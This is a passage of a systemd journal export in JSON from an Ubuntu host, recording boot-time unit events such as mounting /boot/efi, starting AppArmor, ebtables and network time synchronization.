"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Found device /dev/disk/by-label/UEFI.", "UNIT" : "dev-disk-by-label-UEFI.device", "INVOCATION_ID" : "5c43576c87dc4326a86b3081ce645102", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781038616" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f5;b=e2b08827b5804427b422c10c84f1567e;m=67369d;t=5bd16dd2ab604;x=7e47c4b15c12240b", "__REALTIME_TIMESTAMP" : "1615280781047300", "__MONOTONIC_TIMESTAMP" : "6764189", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Mounting /boot/efi...", "UNIT" : "boot-efi.mount", "INVOCATION_ID" : "6a4e024c144a4cccb32d6a9dbf13382f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781046777" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f6;b=e2b08827b5804427b422c10c84f1567e;m=6803fa;t=5bd16dd2b8361;x=d5c232e837e738ae", "__REALTIME_TIMESTAMP" : "1615280781099873", "__MONOTONIC_TIMESTAMP" : "6816762", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "boot-efi.mount", "INVOCATION_ID" : "6a4e024c144a4cccb32d6a9dbf13382f", "MESSAGE" : "Mounted /boot/efi.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781095873" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f7;b=e2b08827b5804427b422c10c84f1567e;m=6804df;t=5bd16dd2b8446;x=37eb2db56a93c4b0", "__REALTIME_TIMESTAMP" : "1615280781100102", "__MONOTONIC_TIMESTAMP" : "6816991", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local File Systems.", "UNIT" : "local-fs.target", "INVOCATION_ID" : "1dacf109c01042b8b9e02d10371c1b1c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781098003" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f8;b=e2b08827b5804427b422c10c84f1567e;m=680a8c;t=5bd16dd2b89f3;x=4910c4745d1d7773", "__REALTIME_TIMESTAMP" : "1615280781101555", "__MONOTONIC_TIMESTAMP" : "6818444", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Create Volatile Files and Directories...", "UNIT" : "systemd-tmpfiles-setup.service", "INVOCATION_ID" : "5e70a567d5ea41bca036432fe845e916", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781101547" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f9;b=e2b08827b5804427b422c10c84f1567e;m=682f82;t=5bd16dd2baee9;x=b533bcff03066bd8", "__REALTIME_TIMESTAMP" : "1615280781111017", "__MONOTONIC_TIMESTAMP" : "6827906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Tell Plymouth To Write Out Runtime Data...", "UNIT" : "plymouth-read-write.service", "INVOCATION_ID" : "bb9896e20e1245a5accc30ae97de9802", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781108890" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fa;b=e2b08827b5804427b422c10c84f1567e;m=684d79;t=5bd16dd2bcce0;x=39cd496056218fc", "__REALTIME_TIMESTAMP" : "1615280781118688", "__MONOTONIC_TIMESTAMP" : "6835577", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Set console font and keymap...", "UNIT" : "console-setup.service", "INVOCATION_ID" : "d076bfd203c341b0aa9ae47eee197dc7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781116825" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fb;b=e2b08827b5804427b422c10c84f1567e;m=686e85;t=5bd16dd2beded;x=c38475369e87d84a", "__REALTIME_TIMESTAMP" : "1615280781127149", "__MONOTONIC_TIMESTAMP" : "6844037", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting ebtables ruleset management...", "UNIT" : "ebtables.service", "INVOCATION_ID" : "ca659a18573443f4b7253369397d23c9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781125009" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fc;b=e2b08827b5804427b422c10c84f1567e;m=6887aa;t=5bd16dd2c0711;x=3a5b6560f5f3420d", "__REALTIME_TIMESTAMP" : "1615280781133585", "__MONOTONIC_TIMESTAMP" : "6850474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting AppArmor initialization...", "UNIT" : "apparmor.service", "INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781131338" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fd;b=e2b08827b5804427b422c10c84f1567e;m=68a7dd;t=5bd16dd2c2744;x=c4a43ea0df13bba7", "__REALTIME_TIMESTAMP" : "1615280781141828", "__MONOTONIC_TIMESTAMP" : "6858717", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Commit a transient machine-id on disk...", "UNIT" : "systemd-machine-id-commit.service", "INVOCATION_ID" : "a7cc3d2edc2d455f8262a9365ac0e1e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781139336" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fe;b=e2b08827b5804427b422c10c84f1567e;m=68e4be;t=5bd16dd2c6425;x=7b9454eaca1e6031", "__REALTIME_TIMESTAMP" : "1615280781157413", "__MONOTONIC_TIMESTAMP" : "6874302", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "console-setup.service", "INVOCATION_ID" : "d076bfd203c341b0aa9ae47eee197dc7", "MESSAGE" : "Started Set console font and keymap.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781154519" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ff;b=e2b08827b5804427b422c10c84f1567e;m=692751;t=5bd16dd2ca6b9;x=a0284d33fd2653c0", "__REALTIME_TIMESTAMP" : "1615280781174457", "__MONOTONIC_TIMESTAMP" : "6891345", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "plymouth-read-write.service", "INVOCATION_ID" : "bb9896e20e1245a5accc30ae97de9802", "MESSAGE" : "Started Tell Plymouth To Write Out Runtime Data.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781168846" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=200;b=e2b08827b5804427b422c10c84f1567e;m=693d51;t=5bd16dd2cbcb9;x=764810199645f137", "__REALTIME_TIMESTAMP" : "1615280781180089", "__MONOTONIC_TIMESTAMP" : "6896977", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-machine-id-commit.service", "INVOCATION_ID" : "a7cc3d2edc2d455f8262a9365ac0e1e2", "MESSAGE" : "Started Commit a transient machine-id on disk.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781177172" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=201;b=e2b08827b5804427b422c10c84f1567e;m=69599e;t=5bd16dd2cd905;x=c708d5829a4ceea3", "__REALTIME_TIMESTAMP" : "1615280781187333", "__MONOTONIC_TIMESTAMP" : "6904222", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-tmpfiles-setup.service", "INVOCATION_ID" : "5e70a567d5ea41bca036432fe845e916", "MESSAGE" : "Started Create Volatile Files and Directories.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781184338" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=202;b=e2b08827b5804427b422c10c84f1567e;m=6978e6;t=5bd16dd2cf84d;x=1302676ed9c7dd18", "__REALTIME_TIMESTAMP" : "1615280781195341", "__MONOTONIC_TIMESTAMP" : "6912230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Update UTMP about System Boot/Shutdown...", "UNIT" : "systemd-update-utmp.service", "INVOCATION_ID" : "4d1e0aa27016434c8dd74250bc4a0327", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781192809" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=203;b=e2b08827b5804427b422c10c84f1567e;m=699f7c;t=5bd16dd2d1ee3;x=c7aed6302cee302f", "__REALTIME_TIMESTAMP" : "1615280781205219", "__MONOTONIC_TIMESTAMP" : "6922108", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Network Time Synchronization...", "UNIT" : "systemd-timesyncd.service", "INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781203129" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=204;b=e2b08827b5804427b422c10c84f1567e;m=69f639;t=5bd16dd2d75a0;x=9d78d1321ca2756", "__REALTIME_TIMESTAMP" : "1615280781227424", "__MONOTONIC_TIMESTAMP" : "6944313", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-update-utmp.service", "INVOCATION_ID" : "4d1e0aa27016434c8dd74250bc4a0327", "MESSAGE" : "Started Update UTMP about System Boot/Shutdown.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781224990" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=205;b=e2b08827b5804427b422c10c84f1567e;m=6a826a;t=5bd16dd2e01d1;x=b54240324bbd03a7", "__REALTIME_TIMESTAMP" : "1615280781263313", "__MONOTONIC_TIMESTAMP" : "6980202", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "MESSAGE" : " * Starting AppArmor profiles", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=206;b=e2b08827b5804427b422c10c84f1567e;m=6ae1af;t=5bd16dd2e6116;x=50c94c5dd5eeb412", "__REALTIME_TIMESTAMP" : "1615280781287702", "__MONOTONIC_TIMESTAMP" : "7004591", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "ebtables.service", "INVOCATION_ID" : "ca659a18573443f4b7253369397d23c9", "MESSAGE" : "Started ebtables ruleset management.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781284952" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=207;b=e2b08827b5804427b422c10c84f1567e;m=6c3082;t=5bd16dd2fafe9;x=7df85c9a8de74e58", "__REALTIME_TIMESTAMP" : "1615280781373417", "__MONOTONIC_TIMESTAMP" : "7090306", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-timesyncd.service", "INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "MESSAGE" : "Started Network Time Synchronization.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781368527" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=208;b=e2b08827b5804427b422c10c84f1567e;m=6c30fa;t=5bd16dd2fb061;x=3716d06186f5c01e", "__REALTIME_TIMESTAMP" : "1615280781373537", "__MONOTONIC_TIMESTAMP" : "7090426", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target System Time Synchronized.", "UNIT" : "time-sync.target", "INVOCATION_ID" : "f36253b2c17d489dabcad39f82479ebc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781371007" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=209;b=e2b08827b5804427b422c10c84f1567e;m=70e9c0;t=5bd16dd346927;x=90e2c516be7e04e9", "__REALTIME_TIMESTAMP" : "1615280781682983", "__MONOTONIC_TIMESTAMP" : "7399872", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", 